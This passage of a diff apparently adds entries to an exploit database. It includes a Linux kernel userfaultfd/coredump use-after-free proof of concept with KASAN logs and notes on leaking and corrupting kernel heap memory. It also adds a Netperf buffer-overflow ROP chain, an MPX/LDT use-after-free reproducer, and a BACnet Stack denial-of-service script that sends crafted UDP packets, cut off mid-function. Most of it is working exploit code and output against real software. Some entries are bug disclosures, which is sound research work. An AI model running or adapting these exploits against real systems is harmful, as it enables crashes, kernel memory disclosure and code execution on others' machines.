+   global workqueue it's running on (depending on where the final fput()
+   happened) indefinitely, which seems potentially bad from a denial-of-service
+   perspective?
+2. Let coredump_wait() set a flag on the mm_struct before dropping the mmap_sem
+   that says "this mm_struct is going away, keep your hands off";
+   let the userfaultfd ioctl handlers check for the flag and bail out as if the
+   mm_struct was already dead;
+   hack userfaultfd_release() so that it only calls vma_merge() if the flag
+   hasn't been set;
+   and because I feel icky about concurrent reads and writes of bitmasks without
+   explicit annotations, either make the vm_flags accesses in
+   userfaultfd_release() and in everything called from elf_core_dump() atomic
+   (because userfaultfd_release will clear bits in them concurrently with reads
+   from elf_core_dump()) or let elf_core_dump() take the mmap_sem for reading
+   while looking at vm_flags.
+   If the fix goes in this direction, it should probably come with a big warning
+   on top of the definition of mmap_sem, or something like that.
+
+
+Here's a simple proof-of-concept:
+======================================================================
+user@debian:~/uffd_coredump$ cat coredump_helper.c
+#include <unistd.h>
+#include <stdlib.h>
+#include <err.h>
+#include <stdbool.h>
+
+int main(void) {
+  char buf[1024];
+  size_t total = 0;
+  bool slept = false;
+  while (1) {
+    int res = read(0, buf, sizeof(buf));
+    if (res == -1) err(1, "read");
+    if (res == 0) return 0;
+    total += res;
+    if (total > 1024*1024 && !slept) {
+      sleep(10);
+      slept = true;
+    }
+  }
+}
+user@debian:~/uffd_coredump$ gcc -o coredump_helper coredump_helper.c
+user@debian:~/uffd_coredump$ cat set_helper.sh 
+#!/bin/sh
+echo "|$(realpath ./coredump_helper)" > /proc/sys/kernel/core_pattern
+user@debian:~/uffd_coredump$ sudo ./set_helper.sh 
+user@debian:~/uffd_coredump$ cat dumpme.c 
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdlib.h>
+#include <linux/userfaultfd.h>
+#include <sys/ioctl.h>
+#include <sys/syscall.h>
+#include <err.h>
+#include <unistd.h>
+#include <sys/mman.h>
+
+int main(void) {
+  // set up an area consisting of half normal anon memory, half present userfaultfd region
+  void *area = mmap(NULL, 1024*1024*2, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+  if (area == MAP_FAILED) err(1, "mmap");
+  memset(area, 'A', 1024*1024*2);
+  int uffd = syscall(__NR_userfaultfd, 0);
+  if (uffd == -1) err(1, "userfaultfd");
+  struct uffdio_api api = { .api = 0xAA, .features = 0 };
+  if (ioctl(uffd, UFFDIO_API, &api)) err(1, "API");
+  struct uffdio_register reg = {
+    .range = { .start = (unsigned long)area+1024*1024, .len = 1024*1024 },
+    .mode = UFFDIO_REGISTER_MODE_MISSING
+  };
+  if (ioctl(uffd, UFFDIO_REGISTER, &reg)) err(1, "REGISTER");
+
+  // spawn a child that can do stuff with the userfaultfd
+  pid_t child = fork();
+  if (child == -1) err(1, "fork");
+  if (child == 0) {
+    sleep(3);
+    if (ioctl(uffd, UFFDIO_UNREGISTER, &reg.range)) err(1, "UNREGISTER");
+    exit(0);
+  }
+
+  *(volatile char *)0 = 42;
+}
+user@debian:~/uffd_coredump$ gcc -o dumpme dumpme.c
+user@debian:~/uffd_coredump$ ./dumpme 
+Segmentation fault (core dumped)
+user@debian:~/uffd_coredump$ 
+======================================================================
+
+dmesg output:
+======================================================================
+[  128.977354] dumpme[1116]: segfault at 0 ip 0000563e14789a6e sp 00007ffed407cd80 error 6 in dumpme[563e14789000+1000]
+[  128.979600] Code: ff 85 c0 74 16 48 8d 35 d7 00 00 00 bf 01 00 00 00 b8 00 00 00 00 e8 c1 fc ff ff bf 00 00 00 00 e8 c7 fc ff ff b8 00 00 00 00 <c6> 00 2a b8 00 00 00 00 c9 c3 0f 1f 84 00 00 00 00 00 41 57 41 56
+[  138.988465] ==================================================================
+[  138.992696] BUG: KASAN: use-after-free in elf_core_dump+0x2063/0x20e0
+[  138.994168] Read of size 8 at addr ffff8881e616ed60 by task dumpme/1116
+
+[  138.996163] CPU: 1 PID: 1116 Comm: dumpme Not tainted 5.0.0-rc8 #292
+[  138.997591] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
+[  138.999570] Call Trace:
+[  139.000237]  dump_stack+0x71/0xab
+[...]
+[  139.001940]  print_address_description+0x6a/0x2b0
+[...]
+[  139.005026]  kasan_report+0x14e/0x192
+[...]
+[  139.006803]  elf_core_dump+0x2063/0x20e0
+[...]
+[  139.013876]  do_coredump+0x1072/0x17a0
+[...]
+[  139.027534]  get_signal+0x93c/0xa90
+[  139.028400]  do_signal+0x85/0xb20
+[...]
+[  139.034068]  exit_to_usermode_loop+0xfb/0x120
+[...]
+[  139.036028]  prepare_exit_to_usermode+0x95/0xb0
+[  139.037114]  retint_user+0x8/0x8
+[  139.037884] RIP: 0033:0x563e14789a6e
+[  139.038661] Code: ff 85 c0 74 16 48 8d 35 d7 00 00 00 bf 01 00 00 00 b8 00 00 00 00 e8 c1 fc ff ff bf 00 00 00 00 e8 c7 fc ff ff b8 00 00 00 00 <c6> 00 2a b8 00 00 00 00 c9 c3 0f 1f 84 00 00 00 00 00 41 57 41 56
+[  139.042892] RSP: 002b:00007ffed407cd80 EFLAGS: 00010202
+[  139.044148] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 00007f654198538b
+[  139.045809] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000001200011
+[  139.047405] RBP: 00007ffed407cdd0 R08: 00007f6541e6f700 R09: 00007ffed407cdae
+[  139.049063] R10: 00007f6541e6f9d0 R11: 0000000000000246 R12: 0000563e14789770
+[  139.050659] R13: 00007ffed407ceb0 R14: 0000000000000000 R15: 0000000000000000
+
+[  139.052673] Allocated by task 1116:
+[  139.053506]  __kasan_kmalloc.constprop.9+0xa0/0xd0
+[  139.054600]  kmem_cache_alloc+0xd6/0x1e0
+[  139.055561]  vm_area_alloc+0x1b/0x80
+[  139.056339]  mmap_region+0x4db/0xa60
+[  139.057179]  do_mmap+0x44d/0x6f0
+[  139.057953]  vm_mmap_pgoff+0x163/0x1b0
+[  139.058936]  ksys_mmap_pgoff+0x16a/0x330
+[  139.059839]  do_syscall_64+0x73/0x160
+[  139.060633]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
+
+[  139.062270] Freed by task 1117:
+[  139.062957]  __kasan_slab_free+0x130/0x180
+[  139.063906]  kmem_cache_free+0x73/0x1c0
+[  139.064829]  __vma_adjust+0x564/0xca0
+[  139.065756]  vma_merge+0x358/0x6a0
+[  139.066504]  userfaultfd_ioctl+0x687/0x17c0
+[  139.067533]  do_vfs_ioctl+0x134/0x8f0
+[  139.068377]  ksys_ioctl+0x70/0x80
+[  139.069141]  __x64_sys_ioctl+0x3d/0x50
+[  139.069959]  do_syscall_64+0x73/0x160
+[  139.070755]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
+
+[  139.072235] The buggy address belongs to the object at ffff8881e616ed50
+                which belongs to the cache vm_area_struct of size 200
+[  139.075075] The buggy address is located 16 bytes inside of
+                200-byte region [ffff8881e616ed50, ffff8881e616ee18)
+[  139.077556] The buggy address belongs to the page:
+[  139.078648] page:ffffea0007985b00 count:1 mapcount:0 mapping:ffff8881eada6f00 index:0x0 compound_mapcount: 0
+[  139.080745] flags: 0x17fffc000010200(slab|head)
+[  139.081724] raw: 017fffc000010200 ffffea000792dc08 ffffea0007765c08 ffff8881eada6f00
+[  139.083477] raw: 0000000000000000 00000000001d001d 00000001ffffffff 0000000000000000
+[  139.085121] page dumped because: kasan: bad access detected
+
+[  139.086667] Memory state around the buggy address:
+[  139.087695]  ffff8881e616ec00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
+[  139.089294]  ffff8881e616ec80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
+[  139.090833] >ffff8881e616ed00: fc fc fc fc fc fc fc fc fc fc fb fb fb fb fb fb
+[  139.092417]                                                        ^
+[  139.093780]  ffff8881e616ed80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
+[  139.095318]  ffff8881e616ee00: fb fb fb fc fc fc fc fc fc fc fc fc fc fc fc fc
+[  139.096917] ==================================================================
+[  139.098460] Disabling lock debugging due to kernel taint
+======================================================================
+
+################################################################################
+
+ One thing that makes exploitation nice here is that concurrent modification of the number of VMAs throws off the use of the heap-allocated array `vma_filesz`: First vma_filesz is allocated with a size based on the number of VMAs, then it is filled by iterating over the VMAs and writing their calculated sizes into the array (without re-checking against the array's size), and then the function iterates over the VMAs again and dumps the entries in vma_filesz to userspace, again without checking whether the array bounds were exceeded.
+This means that you can use this to:
+
+ - leak in-bounds uninitialized values
+ - leak out-of-bounds data
+ - write out-of-bounds data (with constraints on what can be written)
+
+By using FUSE as source of file mappings and as coredump target (assuming that the system has the upstream default core_pattern), you can pause both the loop that performs out-of-bounds writes as well as the loop that performs out-of-bounds reads, so you should be able to abuse this to write in the middle of newly allocated objects if you want to.
+
+The attached proof-of-concept just demonstrates how you can use this to leak kernel heap data because I didn't want to spend too much time on building a PoC for this.
+
+Usage:
+
+=========================================================================
+user@deb10:~/uffd_core_memdump$ tar cf uffd_core_memdump_clean.tar
+tar: Cowardly refusing to create an empty archive
+Try 'tar --help' or 'tar --usage' for more information.
+user@deb10:~/uffd_core_memdump$ tar cf uffd_core_memdump_clean.tar uffd_core_memdump_clean/
+user@deb10:~/uffd_core_memdump$ cd uffd_core_memdump_clean/
+user@deb10:~/uffd_core_memdump/uffd_core_memdump_clean$ ls
+compile.sh  slowfuse.c  uffd_core_oob.c
+user@deb10:~/uffd_core_memdump/uffd_core_memdump_clean$ ./compile.sh 
+user@deb10:~/uffd_core_memdump/uffd_core_memdump_clean$ ./uffd_core_oob 
+waiting for fuse...
+fuse is up
+got sync 1
+wrote sync 2
+########## getattr(/core)
+########## getattr(/core)
+######## create /core
+########## getattr(/core)
+########## getattr(/core)
+starting tarpit
+got sync 2
+0x0000000000000e3c 0x0000000000000000 0x0000000000000000 0x0000000000001000 
+0x0000000000000000 0x0000000000000000 0x0000000000001000 0x0000000000001000 
+0x0000000000021000 0x0000000000001000 0x0000000000000000 0x0000000000000000 
+0x0000000000000000 0x0000000000004000 0x0000000000002000 0x0000000000004000 
+0x0000000000002000 0x0000000000001000 0x0000000000000000 0x0000000000000000 
+0x0000000000001000 0x0000000000001000 0x0000000000001000 0x0000000000021000 
+0x0000000000003000 0x0000000000002000 0xffff9d5e5d354020 0xffff9d5e5d354020 
+0x0000000000000000 0x0000000000000000 0x00007ffe113b5fe8 0x0000000000800000 
+0xffffffffffffffff 0xcbdddcafbd3ba9d1 0x0000000000000000 0x00000001003e0003 
+0x0000000000002c80 0x0000000000000040 0x0000000000006150 0x0038004000000000 
+0x001b001c00400009 0x0000000400000006 0x0000000000000040 0x0000000000000040 
+0x0000000000000040 0x00000000000001f8 0x00000000000001f8 0x0000000000000008 
+0x0000000400000003 0xffff9d5e39c7edd0 0x0000000000000000 0x0000000000000000 
+0x00007fffa1d9dc90 0x0000000000000001 0xffff9d5e421c1300 0x0000000000000000 
+0x0000000000000000 0x0000001100000003 0xffff9d5e5d352020 0xffff9d5e5d352020 
+0x0000000000000000 0x0000000000000000 0x00007fffa1d9efea 0x0000000000800000 
+0xffffffffffffffff 0xcbdddcafbd3bacd1 0x000000000000cccc 0x0000000000000000 
+0x000000000000cdcd 0x0000000000000000 0x000000000000cece 0x0000000000000000 
+0x000000000000cfcf 0x0000000000000000 0x000000000000d0d0 0x0000000000000000 
+0x000000000000d1d1 0x0000000000000000 0x000000000000d2d2 0x0000000000000000 
+0x000000000000d3d3 0x0000000000000000 0x000000000000d4d4 0x0000000000000000 
+0x000000000000d5d5 0x0000000000000000 0x000000000000d6d6 0x0000000000000000 
+0x000000000000d7d7 0x0000000000000000 0x000000000000d8d8 0x0000000000000000 
+0x000000000000d9d9 0x0000000000000000 0x000000000000dada 0x0000000000000000 
+0x000000000000dbdb 0xcbdddcafbd3ba2d1 0x0000000000000000 0x0000000000000000 
+0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000000 
+0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000000 
+0x0000000000000000 0xffff9d5e445b1860 0xffff9d5e445b1860 0x0000000000000000 
+0x0000000000000000 0xffffae0182101000 0x0000000000000000 0x0000000000000000 
+0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000000 
+0x0000000000000000 0x0000000000000180 0xffff9d5e445b18c8 0xffff9d5e445b18c8 
+0xffffffff90f80b40 0x0000000000000000 0x0000000000000000 0x0000000000000000 
+0x0000000000000000 0xcbdddcafbd3ba9d1 0x0000000000000000 0x0000000000000000 
+0x0000000000000000 0x0000000000000000 0x0000000000000000 0xffff9d5e6699ccc0 
+0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000000 
+0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000000 
+[...]
+0xffff9d5e445ebd58 0xffff9d5e445ebd58 0x0000000000000000 0x0000000000000000 
+0x0000000000000000 0x0000000000000000 0x0000000000000000 0xffff9d5e4978d080 
+0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000000 
+0x0000000000000000 0xffff9d5e5e180c60 0x0000000000000000 0xffff9d5e445ebdd0 
+0xffff9d5e445ebdd0 0xffff9d5e445ebde0 0xffff9d5e445ebde0 0xffff9d5e5d669430 
+0x0000000000000000 0x4cab9d3f81e3f812 0xffffffff91058c10 0xffff9d5e49614f20 
+0xffff9d5e5d406b40 0xffff9d5e5d40a328 0xffffffff91a2ae80 0x0000000000000000 
+0x0000000000000000 0x0008400000220000 0x0000000000000000 0x0000000000000000 
+0xffff9d5e445ebe58 0xffff9d5e445ebe58 0x0000000000000000 0x0000000000000000 
+0x0000000000000000 0x0000000000000000 
+Segmentation fault (core dumped)
+=========================================================================
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/46781.zip
\ No newline at end of file
diff --git a/exploits/linux/dos/46997.py b/exploits/linux/dos/46997.py
new file mode 100755
index 000000000..29f6ef4ec
--- /dev/null
+++ b/exploits/linux/dos/46997.py
@@ -0,0 +1,59 @@
+# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
+#
+# Tested on: Kali i686 GNU/Linux
+#
+# Description: Netperf 2.6.0 s a benchmark tool than developed by Helett Packard that can be used to measure the performance of many different types of networking.
+# It provides tests for both unidirectional troughput and end-to-end latency.
+#
+# Vendor: https://hewlettpackard.github.io/netperf/
+#
+# Program received signal SIGSEGV, Segmentation fault.
+# 0x41424344 in ?? ()
+# LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
+#  EAX  0x6d
+#  EBX  0x41414141 ('AAAA')
+#  ECX  0x6f
+#  EDX  0x430320 (test_name) 'TCP_STREAM'
+#  EDI  0xb7ea2000 (_GLOBAL_OFFSET_TABLE_)
+#  ESI  0xbfffd2c0 0x3
+#  EBP  0x41414141 ('AAAA')
+#  ESP  0xbfffd280 0x0
+#  EIP  0x41424344 ('DCBA')
+# Invalid address 0x41424344
+# Program received signal SIGSEGV (fault address 0x41424344)
+# PoC: run -a `python -c 'print "A"*8220+"DCBA"'`
+
+from struct import pack
+
+# int mprotect(void *addr, size_t len, int prot);
+# define PROT_READ       0x1
+# define PROT_WRITE      0x2
+# define PROT_EXEC       0x4
+#
+# gef  p mprotect
+# $1 = {<text variable, no debug info>} 0xb7dbdfd0 <mprotect>
+# gef  p read
+#{ssize_t (int, void *, size_t)} 0xb7db06b0 <__GI___libc_read>
+#
+# gef  ropgadget
+#pop3ret = 0x402fea
+
+offset = 8220
+mprotect = 0xb7dbdfd0 # <mprotect>
+read = 0xb7db06b0 # <read>
+pop3ret = 0x402fea
+target_memory = 0xb7fd4000 # r-xp [vdso]
+
+rop_chain = 'A' * offset
+rop_chain += pack('I', mprotect) # mprotect
+rop_chain += pack('I', pop3ret) #  gadget
+rop_chain += pack('I', 0xbffdf000) # arg - void*
+rop_chain += pack('I', 0x100000) # arg size_t
+rop_chain += pack('I',0x7) # arg int
+rop_chain += pack('I', read)
+rop_chain += pack('I', 0xbffdf000) # return stack
+rop_chain += pack('I',0x00) # arg int fd
+rop_chain += pack('I',0xbffdf000) # arg void
+rop_chain += pack('I',0x200) # arg size_t
+
+print rop_chain
\ No newline at end of file
diff --git a/exploits/linux/dos/47015.c b/exploits/linux/dos/47015.c
new file mode 100644
index 000000000..4ddb55d8d
--- /dev/null
+++ b/exploits/linux/dos/47015.c
@@ -0,0 +1,224 @@
+/*
+When a #BR exception is raised because of an MPX bounds violation, Linux parses
+the faulting instruction and computes the linear address of its memory operand.
+If the userspace instruction is in 32-bit code, this involves looking up the
+correct segment descriptor and adding the segment offset to the address.
+
+(Another codepath that computes the linear address of an instruction is UMIP,
+but I think that requires processors >= Cannon Lake, and my PC isn't that new.)
+
+get_desc() locks the mm context, computes the pointer to the LDT entry, but then
+drops the lock again and returns the pointer. This means that when the caller
+actually accesses the pointer, the pointer may have been freed already.
+
+This bug was introduced in
+<https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=670f928ba09b>
+("x86/insn-eval: Add utility function to get segment descriptor", first in 4.15).
+
+
+To make this easier to hit, I patched a sleep into my kernel:
+
+
+================
+diff --git a/arch/x86/lib/insn-eval.c b/arch/x86/lib/insn-eval.c
+index cf00ab6c66210..5d9c59a28c76f 100644
+--- a/arch/x86/lib/insn-eval.c
++++ b/arch/x86/lib/insn-eval.c
+@@ -7,6 +7,7 @@
+ #include <linux/string.h>
+ #include <linux/ratelimit.h>
+ #include <linux/mmu_context.h>
++#include <linux/delay.h>
+ #include <asm/desc_defs.h>
+ #include <asm/desc.h>
+ #include <asm/inat.h>
+@@ -670,6 +671,8 @@ unsigned long insn_get_seg_base(struct pt_regs *regs, int seg_reg_idx)
+        if (!desc)
+                return -1L;
+ 
++       mdelay(1000);
++
+        return get_desc_base(desc);
+ }
+================
+
+I also built the kernel with KASAN and full preemption.
+
+
+Then I ran the following test program, compiled with
+"gcc -m32 -mmpx -fcheck-pointer-bounds -o mpx mpx.c -pthread":
+
+===============
+*/
+
+#define _GNU_SOURCE
+#include <ucontext.h>
+#include <stdio.h>
+#include <signal.h>
+#include <setjmp.h>
+#include <sys/prctl.h>
+#include <err.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <asm/ldt.h>
+#include <pthread.h>
+
+unsigned long blah;
+
+void post_bounds_label(void);
+
+static void do_ldt(void) {
+  struct user_desc desc = {
+    .entry_number = 0,
+    .base_addr = (unsigned long)&blah,
+    .limit = 0xffffffff,
+    .seg_32bit = 1,
+    .contents = 0,
+    .useable = 1
+  };
+  if (syscall(__NR_modify_ldt, 0x11, &desc, sizeof(desc)))
+    err(1, "modify_ldt");
+}
+
+void *ldt_thread(void *dummy) {
+  while (1) do_ldt();
+}
+
+jmp_buf jumpy;
+void handle_segv(int sig, siginfo_t *info, void *uctx_) {
+  if (info->si_addr != &blah) {
+    printf("addr=%p\n", info->si_addr);
+  }
+  ucontext_t *uctx = uctx_;
+  uctx->uc_mcontext.gregs[REG_EIP] = (unsigned long)post_bounds_label;
+}
+
+int main(void) {
+  do_ldt();
+  pthread_t thread;
+  if (pthread_create(&thread, NULL, ldt_thread, NULL)) err(1, "pthread create");
+
+  struct sigaction act = {
+    .sa_sigaction = handle_segv,
+    .sa_flags = SA_NODEFER|SA_SIGINFO
+  };
+  if (sigaction(SIGSEGV, &act, NULL)) err(1, "sigaction");
+
+  while (1) {
+    unsigned long mpx_bounds[2] = { 5, 6 };
+    unsigned long old_bounds[2];
+    asm volatile(
+      "bndmov %%bnd0, (%0)\n"
+      "bndmov (%2), %%bnd0\n"
+      "mov %1, %%fs\n"
+      "bndcl %%fs:(%3), %%bnd0\n"
+      "bndcn %%fs:(%3), %%bnd0\n"
+      "post_bounds_label:\n"
+      "bndmov (%0), %%bnd0\n"
+    : /*out*/
+    : /*in*/
+      "r"(old_bounds),
+      "r"(0x7),
+      "r"(mpx_bounds),
+      "r"(0x0UL)
+    );
+  }
+}
+/*
+jannh@laptop:~/mpx$ 
+===============
+
+The program started printing various hex numbers, and I immediately got this
+KASAN splat:
+
+===============
+[ 3129.003397] ==================================================================
+[ 3129.003411] BUG: KASAN: use-after-free in insn_get_seg_base+0x9a/0x110
+[ 3129.003416] Read of size 2 at addr ffff8883775da002 by task mpx/13947
+
+[ 3129.003425] CPU: 1 PID: 13947 Comm: mpx Not tainted 5.2.0-rc2+ #10
+[ 3129.003427] Hardware name: [...]
+[ 3129.003429] Call Trace:
+[ 3129.003436]  dump_stack+0x71/0xab
+[ 3129.003441]  ? insn_get_seg_base+0x9a/0x110
+[ 3129.003446]  print_address_description+0x6a/0x250
+[ 3129.003450]  ? insn_get_seg_base+0x9a/0x110
+[ 3129.003454]  ? insn_get_seg_base+0x9a/0x110
+[ 3129.003458]  __kasan_report+0x14e/0x192
+[ 3129.003463]  ? insn_get_seg_base+0x9a/0x110
+[ 3129.003467]  kasan_report+0xe/0x20
+[ 3129.003471]  insn_get_seg_base+0x9a/0x110
+[ 3129.003476]  get_seg_base_limit+0x181/0x4a0
+[ 3129.003482]  insn_get_addr_ref+0x18f/0x490
+[ 3129.003486]  ? insn_get_opcode.part.4+0x16d/0x350
+[ 3129.003490]  ? insn_get_modrm_rm_off+0x60/0x60
+[ 3129.003496]  ? insn_get_modrm.part.5+0xce/0x220
+[ 3129.003501]  ? insn_get_sib.part.6+0x60/0xc0
+[ 3129.003505]  ? insn_get_displacement.part.7+0xe3/0x1d0
+[ 3129.003509]  ? insn_get_immediate.part.8+0x52/0x710
+[ 3129.003514]  ? preempt_count_sub+0x14/0xc0
+[ 3129.003517]  ? preempt_count_sub+0x14/0xc0
+[ 3129.003523]  mpx_fault_info+0x1bc/0x2d0
+[ 3129.003528]  ? trace_event_raw_event_bounds_exception_mpx+0x170/0x170
+[ 3129.003535]  ? notify_die+0x7d/0xc0
+[ 3129.003539]  ? atomic_notifier_call_chain+0x40/0x40
+[ 3129.003543]  ? __ia32_sys_rt_sigaction+0x1c0/0x1c0
+[ 3129.003547]  ? preempt_count_sub+0x14/0xc0
+[ 3129.003550]  ? preempt_count_sub+0x14/0xc0
+[ 3129.003556]  do_bounds+0x24d/0x350
+[ 3129.003560]  ? do_double_fault+0x160/0x160
+[ 3129.003565]  ? fpregs_assert_state_consistent+0x54/0x70
+[ 3129.003570]  ? bounds+0xa/0x20
+[ 3129.003574]  bounds+0x14/0x20
+[ 3129.003578] RIP: 0023:0x565e98e7
+[ 3129.003583] Code: c7 85 64 ff ff ff 06 00 00 00 8d 85 58 ff ff ff b9 07 00 00 00 8d 95 60 ff ff ff bb 00 00 00 00 66 0f 1b 00 66 0f 1a 02 8e e1 <64> f3 0f 1a 03 64 f2 0f 1b 03 66 0f 1a 00 f2 e9 7c ff ff ff 55 89
+[ 3129.003585] RSP: 002b:00000000ffdca1f0 EFLAGS: 00010286
+[ 3129.003588] RAX: 00000000ffdca230 RBX: 0000000000000000 RCX: 0000000000000007
+[ 3129.003591] RDX: 00000000ffdca238 RSI: 0000000000000001 RDI: 00000000ffdca2cc
+[ 3129.003593] RBP: 00000000ffdca2d8 R08: 0000000000000000 R09: 0000000000000000
+[ 3129.003595] R10: 0000000000000000 R11: 0000000000000286 R12: 0000000000000000
+[ 3129.003597] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
+
+[ 3129.003606] Allocated by task 13948:
+[ 3129.003611]  save_stack+0x19/0x80
+[ 3129.003615]  __kasan_kmalloc.constprop.8+0xa0/0xd0
+[ 3129.003618]  kmem_cache_alloc_trace+0xcc/0x5d0
+[ 3129.003622]  alloc_ldt_struct+0x39/0xc0
+[ 3129.003625]  write_ldt+0x236/0x5d0
+[ 3129.003628]  __ia32_sys_modify_ldt+0x50/0xc0
+[ 3129.003632]  do_fast_syscall_32+0x112/0x390
+[ 3129.003635]  entry_SYSENTER_compat+0x7f/0x91
+
+[ 3129.003639] Freed by task 13948:
+[ 3129.003644]  save_stack+0x19/0x80
+[ 3129.003647]  __kasan_slab_free+0x105/0x150
+[ 3129.003650]  kfree+0x82/0x120
+[ 3129.003653]  write_ldt+0x519/0x5d0
+[ 3129.003656]  __ia32_sys_modify_ldt+0x50/0xc0
+[ 3129.003659]  do_fast_syscall_32+0x112/0x390
+[ 3129.003664]  entry_SYSENTER_compat+0x7f/0x91
+
+[ 3129.003669] The buggy address belongs to the object at ffff8883775da000
+                which belongs to the cache kmalloc-32 of size 32
+[ 3129.003674] The buggy address is located 2 bytes inside of
+                32-byte region [ffff8883775da000, ffff8883775da020)
+[ 3129.003677] The buggy address belongs to the page:
+[ 3129.003683] page:ffffea000ddd7680 refcount:1 mapcount:0 mapping:ffff8883d0c00180 index:0xffff8883775dafc1
+[ 3129.003686] flags: 0x17fffc000000200(slab)
+[ 3129.003692] raw: 017fffc000000200 ffffea000f0692c8 ffffea000d4bb988 ffff8883d0c00180
+[ 3129.003696] raw: ffff8883775dafc1 ffff8883775da000 000000010000003f 0000000000000000
+[ 3129.003698] page dumped because: kasan: bad access detected
+
+[ 3129.003701] Memory state around the buggy address:
+[ 3129.003706]  ffff8883775d9f00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
+[ 3129.003711]  ffff8883775d9f80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
+[ 3129.003715] >ffff8883775da000: fb fb fb fb fc fc fc fc fb fb fb fb fc fc fc fc
+[ 3129.003718]                    ^
+[ 3129.003723]  ffff8883775da080: fb fb fb fb fc fc fc fc fb fb fb fb fc fc fc fc
+[ 3129.003727]  ffff8883775da100: fb fb fb fb fc fc fc fc fb fb fb fb fc fc fc fc
+[ 3129.003730] ==================================================================
+[ 3129.003733] Disabling lock debugging due to kernel taint
+===============
+
+I'll send a suggested patch ("[PATCH] x86/insn-eval: Fix use-after-free access to LDT entry") in a minute.
+*/
\ No newline at end of file
diff --git a/exploits/linux/dos/47148.py b/exploits/linux/dos/47148.py
new file mode 100755
index 000000000..ee9a7b327
--- /dev/null
+++ b/exploits/linux/dos/47148.py
@@ -0,0 +1,131 @@
+# Exploit Title: BACnet Stack 0.8.6 - Denial of Service
+# Google Dork: [if applicable]
+# Date: 2019-07-19
+# Exploit Author: mmorillo
+# Vendor Homepage: https://sourceforge.net/p/bacnet/
+# Software Link: https://sourceforge.net/projects/bacnet/files/bacnet-stack/bacnet-stack-0.8.6/
+# Version: bacnet-stack-0.8.6
+# Tested on: Linux
+# CVE: CVE-2019-12480
+
+#!/usr/bin/env python
+# 
+# After reported the bug to the vendor, sharing details
+# about the vulnerability, as well as proof-of-concept code (exploit code to 
+# test), has been release a fix for 0.8.7 release of 
+# BACnet Protocol Stack https://sourceforge.net/p/bacnet/
+
+import socket
+import struct
+import argparse
+import os
+import sys
+from termcolor import colored
+
+#------------------------------------------------------------------------------
+# Command line parser using argparse
+#------------------------------------------------------------------------------
+
+def cmdline_parser():
+    parser = argparse.ArgumentParser(conflict_handler='resolve', add_help=True,
+             description='BACnet Protocol Stack Segmentation fault leading to denial of service', version='0.1',
+             usage="python %(prog)s")
+
+    # Mandatory
+    parser.add_argument('Server', type=str, help='BACnet server IP')
+    parser.add_argument('Port', type=str, help='BACnet port')
+
+    return parser
+
+
+def get_Host_name_IP(): 
+    try: 
+        host_name = socket.gethostname() 
+        host_ip = socket.gethostbyname(host_name) 
+        return host_ip
+    except: 
+        print("Unable to get Hostname and IP") 
+
+
+def target_alive(BACnetServer, BACnetPort):
+    response = os.system("nc -u -z -w 1 " + BACnetServer + " " + str(BACnetPort))
+
+    if response == 0:
+        return True
+    else:
+        return False
+
+#------------------------------------------------------------------------------
+# Main of program
+#------------------------------------------------------------------------------
+
+def main():
+
+    # Get the command line parser.
+    parser = cmdline_parser()
+
+    # Show help if no args
+    if len(sys.argv) == 1:
+        parser.print_help()
+        sys.exit(1)
+
+    # Get results line parser.
+    results = parser.parse_args()
+
+    BACnetServer = results.Server
+    BACnetPort = int(results.Port)
+    SRC_IP = get_Host_name_IP()
+
+    if not target_alive(BACnetServer, BACnetPort):
+        print((colored("[+] BACnet server down", "yellow")))
+
+    else:
+        if target_alive(BACnetServer, BACnetPort):
+
+            payload_DeviceCommunicationControl = "\x81\x0a\x00\x16\x01\x04\x00\x05\x01\x11\x0d\xff\x80\x00\x03\x1a\x0a\x19\x00\x2a\x00\x41"
+
+            print((colored("[+] Sending BACnet DeviceCommunicationControl payload from " + SRC_IP, "green")))
+
+            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
+            s.connect((BACnetServer, BACnetPort))
+            s.send(struct.pack('>I',len(payload_DeviceCommunicationControl)))
+            s.send(payload_DeviceCommunicationControl)
+
+            print((colored("[+] Sent Payload: " + payload_DeviceCommunicationControl.encode('hex') + ' to BACnet server ' + BACnetServer + ' port ' + str(BACnetPort), "yellow")))
+
+        if target_alive(BACnetServer, BACnetPort):
+
+            payload_AtomicReadFile = "\x81\x0a\x00\x1b\x01\x14\x00\x05\x01\x06\xc4\x02\x80\x00\x00\x0e\x35\xff\xdf\x62\xee\x00\x00\x22\x05\x84\x0f"
+
+            print((colored("[+] Sending BACnet AtomicReadFile payload from " + SRC_IP, "green")))
+
+            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
+            s.connect((BACnetServer, BACnetPort))
+            s.send(struct.pack('>I',len(payload_AtomicReadFile)))
+            s.send(payload_AtomicReadFile)
+
+            print((colored("[+] Sent Payload: " + payload_AtomicReadFile.encode('hex') + ' to BACnet server ' + BACnetServer + ' port ' + str(BACnetPort), "yellow")))
+
+        if target_alive(BACnetServer, BACnetPort):
+
